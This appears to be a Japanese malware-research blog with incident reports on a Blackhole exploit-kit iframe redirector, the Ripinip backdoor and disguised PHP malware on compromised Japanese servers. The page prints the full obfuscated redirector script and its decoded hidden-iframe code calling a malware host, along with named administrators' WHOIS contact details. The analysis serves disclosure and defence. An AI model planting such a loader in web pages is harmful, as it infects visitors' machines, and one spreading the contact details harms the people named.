#OCJP-022： 古いWordPress（日本語版）のプラグインを使い「suri-emu.co.jp/125.206.128.37」のサーバのブログにBLACKHOLEのIFRAME-REDIRECTORマルウェアに感染されしました。サイトの脆弱情報は”恐らく”fgallery脆弱性/CVE-2008-0491 【対応済み】

SQLi脆弱性があるWordpressのサイトに感染されたHTMLマルウェアファイルを発見しました。マルウェアの種類はトロイIFRAME-REDIRECTORです。本件のHTMLファイルのURLが色んなスパムメールに書いてあります（K-SHIELD製品のログ調査した時に発見しました）。感染されたサイトの情報、マルウェアの情報、サイトの脆弱の情報（感染された原因）、どんなマルウェアかとを下記のように説明します。

■下記のサイトのブログサイトに↓
suri-emu.co.jp / 125.206.128.37
■下記のURL↓
hxxp://suri-emu.co.jp/blog/wp-content/uploads/fgallery/ir.html
hxxp://suri-emu.co.jp/blog/wp-content/uploads/fgallery/rep.html

↑似たような感染ケースも実は御座いますので↓（別手続きとなります）
hxxp://itjiankang.com/wp-content/plugins/is-human/ir.html
hxxp://itjiankang.com/wp-content/plugins/is-human/reven.html
(下記はダウンロードの証拠↓)
--18:36:28--  hxxp://suri-emu.co.jp/blog/wp-content/uploads/fgallery/ir.html
           =＞ `ir.html'
Resolving suri-emu.co.jp... 125.206.128.37
Connecting to suri-emu.co.jp|125.206.128.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,952 (2.9K) [text/html]
100%[====================================＞] 2,952         --.--K/s
18:36:28 (113.23 MB/s) - `ir.html' saved [2952/2952]

--15:21:38--  hxxp://suri-emu.co.jp/blog/wp-content/uploads/fgallery/rep.html
           => `rep.html'
Resolving suri-emu.co.jp... 125.206.128.37
Connecting to suri-emu.co.jp|125.206.128.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,958 (2.9K) [text/html]
100%[====================================>] 2,958         --.--K/s
15:21:38 (116.07 MB/s) - `rep.html' saved [2958/2958]
■下記のマルウェアJavaScriptコードを発見しました↓
＜script＞if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';
try{new document(12);}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}
ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n="3.5a3.5a51.5a50a15a19a
49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a
56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a4
4.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5
a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a
54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.
5a29.5a18.5a51a57a57a55a28a22.5a22.5a49.5a54a49.5a56a50.5a51.5a56a47.5a54a56.5a
22a54a49.5a57a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a26
.5a23.5a23a26.5a24.5a23a48.5a26a49.5a23.5a25.5a25a49a47.5a49.5a26.5a18.5a15a58.
5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.
5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a5
7a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a
48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.
5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.
5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a
3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48
.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53
.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19
a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a49.5a54a49.5a56a50.5a5
1.5a56a47.5a54a56.5a22a54a49.5a57a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47
.5a50.5a49.5a29.5a26.5a23.5a23a26.5a24.5a23a48.5a26a49.5a23.5a25.5a25a49a47.5a4
9.5a26.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5
a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a5
3a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5
a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.
5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56
.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a2
1a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a
49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.
5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a
54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a
19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3
.5a3.5a61.5".split("a");for(i=0;i-n.length＜0;i++){j=i;
ss=ss+s[f](-h*(1+1*n[j]));}q=ss;e(q);＜/script＞
↑上記のSCRIPTをブラウザーで実行するとMalicious IFRAMEの動きを発見しましたので、
ユーザーがマルウェアサイトに飛ばされてしまいます。
上記のスクリプトをいつもの様に調査したら下記の流れ結果となります↓

■evalは↓
if (document.getElementsByTagName('body')[0]){iframer();} else {document.write(
"＜iframe src='http://energirans.net/main.php?page=710730c6e154dae7' width='10'
 height='10' style='visibility:hidden;position:absolute;left:0;top:0;'＞＜/ifra
 me＞");}function iframer(){var f = document.createElement('iframe');f.setAttri
 bute('src','http://energirans.net/main.php?page=710730c6e154dae7');f.style.vis
 ibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';
 f.setAttribute('width','10');f.setAttribute('height','10');document.getElement
 sByTagName('body')[0].appendChild(f);}
■見やすい様に↓
if (document.getElementsByTagName('body')[0]){
  iframer();　}
else {
  document.write("
＜iframe src='http://energirans.net/main.php?page=710730c6e154dae7' width='10' height='10' 
style='visibility:hidden;position:absolute;left:0;top:0;'＞＜/iframe＞");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://energirans.net/main.php?page=710730c6e154dae7');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);}
■variableの情報↓
var ss = if (document.getElementsByTagName('body')[0]){iframer();} else 
{document.write("＜iframe src='http://energirans.net/main.php?page=710730c6e154dae7' 
width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'＞
＜/iframe＞");}  

var q = if (document.getElementsByTagName('body')[0]){iframer();} else 
{document.write("＜iframe src='http://energirans.net/main.php?page=710730c6e154dae7' 
width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'＞
＜/iframe＞");}  

var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else 
{document.write("＜iframe src='http://energirans.net/main.php?page=710730c6e154dae7' 
width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'＞
＜/iframe＞");}  
■document.writeを実行すると↓
＜iframe src='http://energirans.net/main.php?page=710730c6e154dae7' width='10' 
height='10' style='visibility:hidden;position:absolute;left:0;top:0;'＞＜/iframe＞ 
■どんなマルウェア？
↑hxxp://energirans.net/main.php?page=710730c6e154dae7はマルウェアサイトですが、
２５日にすでにダウンしてしまいます。
情報を調べたらIPは下記となります↓
41.64.21.71 (Dynamic ADSL, Egypt), 
115.249.190.46 (Reliance Communication, India)
↑ブラックリストの情報に確認したらスパムボットのIPですね。

実行してしまいますとブラウザがPDFマルウェアをダウンロードしてしまい、パソコンに
マルウェアを感染させる事となります。
つい最近（昨日）似たようなjavascriptコードも発見しましたので、Twitterで報告しました。
クリックしたら下記の画像となります↓

↑感染されたサーバと飛ばす先のIPが違うけど、まったく同じコードなので、参考になります。
上記のケースですとBLACKHOLE EXPLOIT-KITの感染仕組みです。同じ形で本件にも発見ｓｈたので、
同じBLACKHOLE-EXPLOIT仕組みだろうと。
上記のBLACKHOLEサイトの情報↓


■ウイルススキャンをしましたら↓
File name:      ir.html
MD5:            48499618d889a335398b996336de0326
File size:      2.9 KB ( 2952 bytes )
File type:  HTML
Ratio:          14 / 43
Detection:      [CLICK]

---------------------------------------------------
Antivirus  Result  Update
---------------------------------------------------
AhnLab-V3  -  20120228
AntiVir  JS/iFrame.SA  20120229
Antiy-AVL  -  20120229
Avast  JS:Redirector-PA [Trj]  20120228
AVG  -  20120229
BitDefender  Trojan.JS.Agent.FHM  20120229
ByteHero  -  20120225
CAT-QuickHeal  -  20120229
ClamAV  -  20120229
Commtouch  JS/IFrame.HC.gen  20120229
Comodo  -  20120229
DrWeb  -  20120229
Emsisoft  Exploit.JS.Blacole!IK  20120229
eSafe  -  20120227
eTrust-Vet  -  20120228
F-Prot  JS/IFrame.HC.gen  20120228
F-Secure  Trojan.JS.Agent.FHM  20120229
Fortinet  -  20120229
GData  Trojan.JS.Agent.FHM  20120229
Ikarus  Exploit.JS.Blacole  20120229
Jiangmin  -  20120228
K7AntiVirus  Riskware  20120228
Kaspersky  Trojan.JS.Iframe.zt  20120229
McAfee  -  20120229
McAfee-GW-Edition  -  20120229
Microsoft  Exploit:JS/Blacole.CH  20120229
NOD32  -  20120229
Norman  -  20120228
nProtect  Trojan.JS.Agent.FHM  20120229
Panda  -  20120228
PCTools  -  20120228
Prevx  -  20120229
Rising  -  20120228
Sophos  Mal/Iframe-W  20120229
SUPERAntiSpyware  -  20120229
Symantec  -  20120229
TheHacker  -  20120228
TrendMicro  -  20120229
TrendMicro-HouseCall  -  20120229
VBA32  -  20120228
VIPRE  -  20120229
ViRobot  -  20120229
VirusBuster  -  20120229

■どんなマルウェアの仕組み？
最近はやったBBBスパムのマルウェア仕組みですね。
下記のメールの中に本件の感染されたサイトのURLを発見しました↓

↑このメールはHTMLで開くとリンクが出ましたので、
クリックをしたら本件のブラウザーはマルウェアURLに飛ばされてしまい、
そしてmalicious iframeでhxxp://energirans.net/main.php?page=710730c6e154dae7にまた飛ばされます。
■どうやって感染されましたのか？
調べたら本サイトが使っているWordPressのfGalleryプラグインが古いですので、
CVE-2008-0491のSQL Injection脆弱性が発見しました。
この脆弱性と他の脆弱性を使われたら、IR.HTMLのマルウェアファイルを保存したそうです。
最新版の①PHP、②WordPressと③WordPRessプラグインにアップグレードすれば
同じ問題は今後起きないと思います。
■念のために下記はサイトの連絡先情報（報告手続きの為）↓
a. [Domain Name]                SURI-EMU.CO.JP
g. [Organization]               Suriemu Corporation
l. [Organization Type]          Company
m. [Administrative Contact]     KO3099JP
n. [Technical Contact]          TS4838JP
p. [Name Server]                ns1.secure.net
p. [Name Server]                ns2.secure.net

a. [JPNICハンドル]              KO3099JP
b. [氏名]                       大村 国広
c. [Last, First]                Omura, Kunihiro
d. [電子メイル]                 chubu@suri-emu.co.jp
f. [組織名]                     株式会社スリーエム中部
g. [Organization]               Suriemu Chubu Corporation
k. [部署]                       
l. [Division]                   
m. [肩書]                       課長
n. [Title]                      Manager
o. [電話番号]                   
p. [FAX番号]                    
y. [通知アドレス]               
[最終更新]                      2002/10/16 10:12:08(JST)
                                aoi@soc-n.ocn.ad.jp
                                
a. [JPNICハンドル]              TS4838JP
b. [氏名]                       沢井 孝浩
c. [Last, First]                Sawai, Takahiro
d. [電子メイル]                 sawai@ibic.co.jp
f. [組織名]                     株式会社アビック
g. [Organization]               Ibic Corporation
k. [部署]                       第3コンピュータ課
l. [Division]                   No3 Computer Dept.
m. [肩書]                       課長
n. [Title]                      Section Manager
■リファレンス↓
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0491
http://fahlstad.se/wordpress/plugins/fgallery/
http://suri-emu.co.jp
■追加情報ですが↓
亜米利加研究者サークルに相談したら、下記の結果が確認出来ました↓
・本件はBLACKHOLE EXPLOIT-KITからハッキングされたサイト
・下記のURL書き方は本exploit kitの特徴↓
   hxxp://hapturing.net/main.php?page=2d057d472cd217e2
   hxxp://energirans.net/main.php?page=710730c6e154dae7
　　　　　^^^^^          ^^^^^^^^      ^^^^^^^^
　　　　　↑↑             ↑↑           ↑↑
         ホスト         exploit kit    感染ID/スパムID
　　　　　
・上記のマルウェアサーバにはBLACKHOKE EXPLOIT-KITの感染サーバです（infector）
・上記のサーバからZeuS、SpyEye又は別のワンクリック関係のトロイに感染される可能性がある
・BLACKHOLE EXPLOIT-KITが日本のWordPressサーバ迄に攻撃をしてたと認識しましょう！

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック
Tweet

#OCJP-021：ODN/JAPAN TELECOMのネットワークで中国トロイバックドアRipinipに感染されている中国IISサーバ（IP:219.66.232.108）を発見！【対応済み】

今回は個人情報を盗んだトロイ・バックドア「Ripinip」を発見しました。感染された環境は非常にあやしいですが、中国版のIISサーバだそうです。本件のトロイに感染されたら色んな個人情報をリモートに送信してしまう状況ですので、下記詳しく説明をさせて頂きます。本件のトロイは非常に危険ですが、削除のご協力をお願いしたいと思います。

■下記のサーバ↓
219.66.232.108
Server: Microsoft-IIS/6.0中国版
■下記のURLに↓
hxxp://219.66.232.108/vct/set.rar
hxxp://219.66.232.108/vct/vel19.rar
hxxp://219.66.232.108/vct/stL1.rar
※マークしたURLはバックドア「Ripinip」マルウェアです…
■ダウンロードの証拠↓
--16:30:17--  http://219.66.232.108/vct/vel19.rar
           => `vel19.rar'
Connecting to 219.66.232.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73,728 (72K) [application/octet-stream]
100%[====================================>] 73,728       455.70K/s
16:30:17 (452.95 KB/s) - `vel19.rar' saved [73728/73728]

--16:30:26--  http://219.66.232.108/vct/stL1.rar
           => `stL1.rar'
Connecting to 219.66.232.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 249,856 (244K) [application/octet-stream]
100%[===================================> ] 249,856      656.60K/s
16:30:27 (655.20 KB/s) - `stL1.rar' saved [249856/249856]

--16:30:33--  http://219.66.232.108/vct/set.rar
           => `set.rar'
Connecting to 219.66.232.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,672 (28K) [application/octet-stream]
100%[====================================>] 28,672        --.--K/s
16:30:33 (22.07 MB/s) - `set.rar' saved [28672/28672]

※念のためにウェブサーバのヘッターを取ろうと↓
--19:11:47--  http://219.66.232.108/
           => `index.html'
Connecting to 219.66.232.108:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Content-Length: 1193
  Content-Type: text/html
  Content-Location: http://219.66.232.108/iisstart.htm
  Last-Modified: Fri, 21 Feb 2003 12:15:52 GMT
  Accept-Ranges: bytes
  ETag: "0ce1f9a2d9c21:24e"
  Server: Microsoft-IIS/6.0
  Date: Sun, 26 Feb 2012 10:11:11 GMT
  Connection: keep-alive
Length: 1,193 (1.2K) [text/html]
100%[====================================>] 1,193         --.--K/s
19:11:47 (58.18 MB/s) - `index.html' saved [1193/1193]
■下記のマルウェアを発見しました↓
【備考】１）と２）は前回調査した事あるマルウェアですが、
調査に付いて以前の調査したページにリンクする形にします。
下記の３）はバックドア「Ripinip」ですね、日本に中々見つからない物です。中国には
沢山発見されたそうです。詳しく調査します。
１）set.rar
アファイル　　：「set.rar」
マルウェア種類： トロイ・ドロッパー
マルウェア名　： Win32/Trojan/Agent/Dropper/PINCAV
マルウェア機能： ドロッパー(Dropper)機能
説明　　　　　： 他のマルウェアをPCに保存し、メモリで実行させる（ドロッパー）
                 感染されたPCにマルウェアMFC42.DLLプロセスが沢山出てきました。

MD5:           642ef29e0194075c830d0f2a418d8fce
File size:   28.0 KB ( 28672 bytes )
File type:   にせRAR、実は：Win32 EXE
Detection ratio: 27 / 43
Analysis date:   2012-02-26 07:40:52 UTC
DetectionResult: [CLICK]

前回の調査リファレンス↓
http://unixfreaxjp.blogspot.com/2012/02/ocjp-013.html
http://unixfreaxjp.blogspot.com/2011/11/pincavfreebit-idc.html
２）vel19.rar
アファイル　　：「vel19.rar」
マルウェア種類： トロイ・ドロッパー
マルウェア名　： Win32/Trojan/
マルウェア機能： ドロッパー(Dropper)機能、ウイルス対策ソフトを止める機能(KillAV)、
                 ワーム（Autorun経由感染機能）
説明　　　　　： 感染されたPCのウイルス対策ソフトを止められます、マルウェアを実行されて、
                 Autorun機能を使っているデバイスに感染仕組みを作れます。
                 【備考】DLL実行環境が必要、実行した時に下記のクラッシュもあります↓
                  dll_analysis.exe   
                  STDOUT:
                  Renaming input file to .\d1.tmp.dll
                  found acrxEntryPoint at 0x100015e0
                  found dll entry point at 0x10007e6e
                  found acrxGetApiVersion at 0x100083e0
                  Dll is not a BHO
                  Invoking regsvr32
                  calling DllMain
                    {
                    Stderr:
                    Error reloading Dll 
                  Unable To Locate Component :
                  OK This application has failed to start because acdb17.dll 
                  was not found. Re-installing the application may fix this problem. 
                  ↑ニセAutoCADアプリの形です、AutoCAD runtime DLLを探すと…
                  acdb17.dll/AutoCAD runtimeが無いと実行が不可能ですね。
MD5:           28663dc50d4400e05de15db7cffcbb79
File size:       72.0 KB ( 73728 bytes )
File type:   ニセRAR/Win32 DLL
Detection ratio: 38 / 43
Analysis date:   2012-02-26 07:41:09 UTC
DetectionResult: [CLICK]

前回の調査リファレンス↓
http://unixfreaxjp.blogspot.com/2011/11/autocadfreebitidc.html
http://unixfreaxjp.blogspot.com/2012/02/ocjp-013.html
【備考】↑上記のサンプルMD5と今回のは違います。今回に付いてパッカーで作り直した物で、
中身は同じですが、MD5だけが変わっています。
３）stL1.rar

アファイル　　：「stL1.rar」
マルウェア種類： トロイ・スパイウェア/バックドア
マルウェア名　： Win32/Trojan RIPINIP
マルウェア機能： トロイ、バックドア、スパイウェア
説明　　　　　： 感染されたPCの情報がリモートに送信されます(Trojan/Spyware)

MD5:             ecb3012685ac3c803817999dee39712c
File size:       244.0 KB ( 249856 bytes )
File name:       stL1.rar
File type:       ニセRARファイル、実はWin32 EXE
Detection ratio: 39 / 43
Analysis date:   2012-02-26 07:43:12 UTC
DetectionResult: [CLICK]
-----------------------------------------------------------
Antivirus  Result  Update
-----------------------------------------------------------
AhnLab-V3  Win-Trojan/Ripinip.249856.ET  20120222
AntiVir  TR/Spy.Gen  20120222
Antiy-AVL  AdWare/Win32.BHO.gen  20120213
Avast  Win32:BHO-ADU [Adw]  20120223
AVG  BackDoor.Generic13.DCG  20120223
BitDefender  Gen:Variant.Ripinip.1  20120223
ByteHero  -  20120225
CAT-QuickHeal  Backdoor.Ripinip.C4  20120222
ClamAV  Trojan.Ripnip-2  20120223
Commtouch  W32/Autorun.XG  20120222
Comodo  TrojWare.Win32.TrojanDropper.BHO.GHT  20120223
DrWeb  Trojan.MulDrop1.48008  20120223
Emsisoft  Backdoor.Win32.Ripinip!IK  20120223
eSafe  -  20120221
eTrust-Vet  Win32/SillyAutorun.EEG  20120222
F-Prot  W32/Autorun.XG  20120222
F-Secure  Backdoor:W32/Ripinip.C  20120223
Fortinet  W32/Ripinip.K!tr.bdr  20120223
GData  Gen:Variant.Ripinip.1  20120223
Ikarus  Backdoor.Win32.Ripinip  20120223
Jiangmin  Trojan/Generic.beqn  20120222
K7AntiVirus  Backdoor  20120222
Kaspersky  Backdoor.Win32.Ripinip.otb  20120223
McAfee  BackDoor-EVC  20120223
McAfee-GW-Edition  Heuristic.BehavesLike.Win32.Downloader.J  20120222
Microsoft  Backdoor:Win32/Ripinip.N  20120222
NOD32  a variant of Win32/Ripinip.AD  20120223
Norman  W32/Ripinip.D  20120222
nProtect  Backdoor/W32.Ripinip.249856.Q  20120222
Panda  Trj/Genetic.gen  20120222
PCTools  Backdoor.Ripinip  20120221
Prevx  -  20120226
Rising  Backdoor.Win32.Autorun.p  20120223
Sophos  Troj/Kirjat-A  20120223
SUPERAntiSpyware  Trojan.Agent/Gen-FakeAlert  20120206
Symantec  Backdoor.Ripinip  20120223
TheHacker  Trojan/Dropper.Agent.oxz  20120222
TrendMicro  BKDR_RIPINIP.SMA  20120222
TrendMicro-HouseCall  BKDR_RIPINIP.SMA  20120223
VBA32  Backdoor.Ripinip.bbt  20120222
VIPRE  Trojan.Win32.Generic.pak!cobra  20120222
ViRobot  -  20120222
VirusBuster  Trojan.Ripnip.Gen.1  20120222
■マルウェア説明↓
上記のトロイバックドアRipinipの行動分析調査の説明となります↓
感染されたPCにstL1.rarを実効されたら下記のファイルを作られます↓
%Temp%\＜RANDOM ○○○>.exe  20,480 bytes / MD5: eed9cc6f7a6437a171be2a71a1ed6115 
%System%\fsutk.dll           118,784 bytes / MD5: 0d97a7aad8461e2643cde89050f4ff22

本件のstL1.rarが○○○.exeマルウェアを実行し、fsutk.dllをロードしてからiexplore.exeを実行。
その時点からずっと○○○.exeマルウェアのプロセスの中に残っていますがstL1.rarのプロセス終了。

○○○.exeが下記のDLLをロードします↓
C:\WINDOWS\system32\MFC42.DLL
C:\WINDOWS\system32\MSCTF.dll
C:\WINDOWS\system32\imm32.dll

それで、Windowsのサービスを変更します↓
%SystemRoot%\System32\svchost.exe -k netsvcs 
サービス名は：Ipripですね、←設定した時に「SERVICE_AUTO_START」のFLAGを立ってます。

レジストリーを見たら下記のブラウザーのキーが追加されます↓
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF50AC63-19DA-487E-AD4A-0B452D823B59}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF50AC63-19DA-487E-AD4A-0B452D823B59}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
　　　　　　　{BF50AC63-19DA-487E-AD4A-0B452D823B59}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\
　　　　　　　{BF50AC63-19DA-487E-AD4A-0B452D823B59}

さらに上記キーは下記の様に情報が入れてしまいます↓
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF50AC63-19DA-487E-AD4A-0B452D823B59}\InprocServer32]
        (Default) = "%System%\fsutk.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF50AC63-19DA-487E-AD4A-0B452D823B59}]
        SJBC = 0x0000012E
        CUDA = 0x00000844
        FSHS = 0x00000000
        BLOD = 0x00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
{BF50AC63-19DA-487E-AD4A-0B452D823B59}]
        (Default) = ""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\
{BF50AC63-19DA-487E-AD4A-0B452D823B59}]
        Flags = 0x00000000
↑これで完全にブラウザの設定が変わっています。
この変更を行っているからブラウザがマウスの左クリックが押されたら、記録されます↓
VK_LBUTTON (1)   260 
下記はトロイバックドアRipinipのバイナリー調査結果です↓
ExifToolで見たらバイナリーのヘッタ情報は下記の様に見えます（Ref: VT）
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2011:09:18 13:40:10+01:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 8192
LinkerVersion............: 6.0
EntryPoint...............: 0x2c6e
InitializedDataSize......: 237568
SubsystemVersion.........: 4.0
ImageVersion.............: 0.0
OSVersion................: 4.0
それでバイナリーを調査した限りでは下記のあやしい情報を発見！↓
1. Compile Time: 2011-09-18 21:40:10　←作られた日付けは今年の2月26日だけど…
2. CRC is wrong! Claimed: 0 Actual:  257764 ←(packerを使った証拠になりますね)
3. Packed by Microsoft Visual C++ v6.0
4. あやしいDLL Calls:
   0x403058 GetCurrentProcess  ← debug trace
   0x40306c GetTickCount       ← debug trace
   0x403090 CloseHandle        ← debug trace
   0x403040 WriteProcessMemory ← malware act
   0x403068 CreateFileA        ← malware act
   0x40307c CreateProcessA     ← malware act
   0x40303c VirtualAllocEx     ← System Hook , no good...
   0x403044 ReadProcessMemory  ← Privilage Escalation
   0x403000 OpenProcessToken   ← Privilage Escalation
5.「EVIL」レジストリーコール↓
   ADVAPI32.dll.RegOpenKeyExA Hint[370]
   ADVAPI32.dll.RegSetValueExA Hint[390]
   ADVAPI32.dll.RegQueryValueExA Hint[379]
   ADVAPI32.dll.RegCloseKey Hint[347]
   ADVAPI32.dll.RegCreateKeyA Hint[350]
6.「Un-Authorized」システムのサービス変更コール↓
   ADVAPI32.dll.OpenServiceA Hint[327]
   ADVAPI32.dll.CloseServiceHandle Hint[52]
   ADVAPI32.dll.QueryServiceStatus Hint[341]
リファレンス↓
http://www.threatexpert.com/files/fsutk.dll.html
http://greatis.com/blog/backdoor/fsutk-dll.htm
http://f.virscan.org/FSUTK.DLL.html
■感染ソースの情報（連絡先の為）
inetnum:        219.66.128.0 - 219.66.255.255
netname:        ODN
descr:          Open Data Network(JAPAN TELECOM CO.,LTD.)
country:        JP
admin-c:        JP00035900
tech-c:         JP00035900
changed:        apnic-ftp@nic.ad.jp 20080714
source:         JPNIC

[グループハンドル]              JP00035900
[グループ名]                    コアネットワーク課
[Group Name]                    IPTG
[電子メール]                    abuse@odn.ad.jp
[組織名]                        ソフトバンクテレコム株式会社
[Organization]                  SOFTBANK TELECOM Corp.
[部署]                          高度ネットワーク部
[Division]                      Advanced Network Department
[電話番号]                      03-6889-1091
[最終更新]                      2008/03/25 18:53:07(JST)
                                ito@gw.odn.ad.jp

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック
Tweet

#OCJP-020： WordPressサービスの脆弱性があるサイト（gutchi.jp/210.157.5.15）にIRC経由PHPとPerlマルウェアに感染されました！ 【対応済み】

今回の発見に付いて、マルウェア感染仕組みから説明をさせて頂きます。
本件の感染仕組みは日本に何回も見ましたので、今後同じ問題が起きないように詳しく書きます、宜しくお願いします。

証拠からで行くと、さっそくですが↓

■下記のホスト↓
gutchi.jp / 210.157.5.15
■下記のURL↓
hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani1.jpg
hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani2.jpg
hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt
hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/nyamuk.txt
■ダウンロードの証拠とスナップショット証拠↓
--20:54:57--  hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani2.jpg
           => `pani2.jpg'
Resolving gutchi.jp... 210.157.5.15
Connecting to gutchi.jp|210.157.5.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,771 (2.7K) [image/jpeg]
100%[====================================>] 2,771         --.--K/s
20:54:57 (78.83 MB/s) - `pani2.jpg' saved [2771/2771]

--20:55:18--  hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani1.jpg
           => `pani1.jpg'
Resolving gutchi.jp... 210.157.5.15
Connecting to gutchi.jp|210.157.5.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,859 (2.8K) [image/jpeg]
100%[====================================>] 2,859         --.--K/s
20:55:18 (1.60 MB/s) - `pani1.jpg' saved [2859/2859]

--20:55:27--  hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt
           => `unix.txt'
Resolving gutchi.jp... 210.157.5.15
Connecting to gutchi.jp|210.157.5.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 59,589 (58K) [text/plain]
100%[====================================>] 59,589        --.--K/s
20:55:28 (868.37 KB/s) - `unix.txt' saved [59589/59589]

--20:55:34--  hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/nyamuk.txt
           => `nyamuk.txt'
Resolving gutchi.jp... 210.157.5.15
Connecting to gutchi.jp|210.157.5.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53,447 (52K) [text/plain]
100%[====================================>] 53,447        --.--K/s
20:55:35 (442.05 KB/s) - `nyamuk.txt' saved [53447/53447]
■ブラウザから安全で直ぐに確認が出来ます↓


■本件のファイルは感染されたサーバに保存されていて実行権限が持っています↓


■下記のマルウェアを発見しました↓(スキャン結果とマルウェア説明)
File name:       pani1.jpg
File size:       2.8 KB ( 2859 bytes )
MD5:             fe0b467c8c2601dbb344d741e56f4baf
File type:       looks: JPG File, actual: PHP Script
DetectionRatio:  1 / 43
Analysis Date:   2012-02-25 15:22:30 
Analysis Result: [CLICK]

File name:       pani2.jpg
File size:       2.7 KB ( 2771 bytes )
MD5:             849927dae774a1909ae6e27c1c3a8869
File type:       looks: JPG File, actual: PHP Script
